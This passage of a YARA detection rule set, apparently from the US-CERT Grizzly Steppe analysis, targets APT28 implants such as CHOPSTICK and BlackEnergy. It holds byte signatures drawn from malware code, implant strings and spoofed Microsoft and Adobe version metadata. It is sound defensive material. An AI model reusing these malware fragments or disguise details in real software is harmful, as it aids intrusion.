1E FA 4A E5 79 81 3F DB 56 63 1B 08 0C BF DC FC 75 19 3E 1F B3 EE 9D 4C 17 8B 16 9D 99 C3 0C 89 06 BB F1 72 46 7E F4 0B F6 CB B9 C2 11 BE 5E 27 94 5D 6D C0 9A 28 F2 2F FB EE 8D 82 C7 0F 58 51 03 BF 6A 8D CD 99 F8 04 D6 F7 F7 88 0E 51 88 B4 E1 A9 
A4 3B } $cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01 00 01 00 AF BD 26 C9 04 65 45 9F 0E 3F C4 A8 9A 18 C8 92 00 B2 CC 6E 0F 2F B2 71 90 FC 70 2E 0A F0 CA AA 5D F4 CA 7A 75 8D 5F 9C 4B 67 32 45 CE 6E 2F 16 3C F1 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC C7 30 B2 9E 0B 90 F8 B2 94 90 1D 52 B5 2F F9 8B E2 E6 C5 9A 0A 1B 05 42 68 6A 3E 88 7F 38 97 49 5F F6 EB ED 9D EF 63 FA 56 56 0C 7E ED 14 81 3A 1D B9 A8 02 BD 3A E6 E0 FA 4D A9 07 5B E6 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them } rule IMPLANT_2_v20 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $func = { 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 8B 45 D8 89 55 F8 72 A0 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_3_v1 { meta: description = "X-Agent/CHOPSTICK Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = ">process isn't exist<" ascii wide $STR2 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii wide $STR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" ascii wide $STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide $STR5 = {0f b6 14 31 88 55 ?? 33 d2 8b c1 f7 75 ?? 8b 45 ?? 41 0f b6 14 02 8a 45 ?? 
03 fa} condition: any of them } rule IMPLANT_3_v2 { meta: description = "X-Agent/CHOPSTICK Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $base_key_moved = {C7 45 ?? 3B C6 73 0F C7 45 ?? 8B 07 85 C0 C7 45 ?? 74 02 FF D0 C7 45 ?? 83 C7 04 3B C7 45 ?? FE 72 F1 5F C7 45 ?? 5E C3 8B FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8 C7 45 ?? B1 D1 FF FF C7 45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45 ?? 33 35} $base_key_b_array = {3B C6 73 0F 8B 07 85 C0 74 02 FF D0 83 C7 04 3B FE 72 F1 5F 5E C3 8B FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B FF 55 8B EC 83 EC 10 A1 33 35 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them } rule IMPLANT_3_v3 { meta: description = "X-Agent/CHOPSTICK Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = ".?AVAgentKernel@@" $STR2 = ".?AVIAgentModule@@" $STR3 = "AgentKernel" condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them } rule IMPLANT_4_v1 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64 C6 45 DA 76 C6 45 DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF 32 C6 45 E0 2EE9 ?? ?? ?? 
??} $STR2 = {C7 45 EC 5A 00 00 00 C7 45 E0 46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00} condition: (uint16(0)== 0x5A4D or uint16(0) == 0xCFD0 or uint16(0)== 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 1 of them } rule IMPLANT_4_v2 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $BUILD_USER32 = {75 73 65 72 ?? ?? ?? 33 32 2E 64} $BUILD_ADVAPI32 = {61 64 76 61 ?? ?? ?? 70 69 33 32} $CONSTANT = {26 80 AC C8} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } /* Some false positives - replaced with alternative rule (see below) rule IMPLANT_4_v3 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $a1 = "Adobe Flash Player Installer" wide nocase $a3 = "regedt32.exe" wide nocase $a4 = "WindowsSysUtility" wide nocase $a6 = "USB MDM Driver" wide nocase $b1 = {00 05 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 3F 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5C 04 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 1C 02 00 00 01 00 30 00 30 00 31 00 35 00 30 00 34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 46 00 0F 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 
00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 64 00 6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 1C 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 46 00 0F 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 
00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 64 00 6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 48 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 28 00 08 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 15 00 B0 04 09 04 B0 04} $b2 = {34 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 03 00 03 00 04 00 02 00 03 00 03 00 04 00 02 00 3F 00 00 00 00 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 02 00 00 00 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 70 02 00 00 00 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4A 00 15 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 53 00 6F 00 6C 00 69 00 64 00 20 00 53 00 74 00 61 00 74 00 65 00 20 00 4E 00 65 00 74 00 77 00 6F 00 72 00 6B 00 73 00 00 00 00 00 62 00 1D 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 6C 00 61 00 79 
00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 00 30 00 08 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 32 00 09 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 73 00 74 00 2E 00 65 00 78 00 65 00 00 00 00 00 76 00 29 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 41 00 64 00 6F 00 62 00 65 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 73 00 20 00 49 00 6E 00 63 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 65 00 64 00 00 00 00 00 3A 00 09 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 73 00 74 00 2E 00 65 00 78 00 65 00 00 00 00 00 5A 00 1D 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 6C 00 61 00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 00 34 00 08 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 44 00 00 00 00 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04 46 45 32 58} $b3 = {C8 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 04 02 00 00 01 00 30 00 34 00 30 
00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 48 00 10 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 49 00 44 00 45 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 39 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04 } $b4 = {9C 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 06 00 01 40 B0 1D 01 00 06 00 01 40 B0 1D 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 FA 02 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 D6 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 58 00 18 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6F 00 72 00 20 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 00 00 6C 00 26 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 36 00 2E 00 31 00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 20 00 28 00 77 00 69 00 6E 00 37 00 5F 00 72 00 74 00 6D 00 2E 00 30 00 39 00 30 00 37 00 31 00 33 00 2D 00 31 00 32 00 35 00 35 00 29 00 00 00 3A 00 0D 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 72 00 65 00 67 00 65 00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00 42 00 0D 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 72 00 65 00 67 00 65 00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 
65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 42 00 0F 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 36 00 2E 00 31 00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04} $b5 = {78 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 00 00 05 00 6A 44 B1 1D 00 00 05 00 6A 44 B1 1D 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D6 02 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 B2 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 53 00 79 00 73 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 00 00 00 00 72 00 29 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 20 00 28 00 77 00 69 00 6E 00 37 00 73 00 70 00 31 00 5F 00 72 00 74 00 6D 00 2E 00 31 00 30 00 31 00 31 00 31 00 39 00 2D 00 31 00 38 00 35 00 30 00 29 00 00 00 00 00 30 00 08 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 
72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00 40 00 0C 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 2E 00 65 00 78 00 65 00 00 00 58 00 1C 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 53 00 79 00 73 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 20 00 2D 00 20 00 55 00 6E 00 69 00 63 00 6F 00 64 00 65 00 00 00 42 00 0F 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04} $b6 = {D4 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 02 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 00 65 00 49 00 6E 00 66 00 6F 00 00 00 10 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 53 00 65 00 72 
00 69 00 61 00 6C 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 00 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 34 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04} condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and (((any of ($a*)) and (uint32(uint32(0x3C)+8) == 0x00000000)) or (for any of ($b*): ($ in (uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+20))..(uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+20))+uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+16))))))) } */ /* Yara Rule Set Author: Florian Roth Date: 2017-02-12 Identifier: Grizzly Steppe Alternatives */ /* Alternative Rule Set ---------------------------------------------------- */ 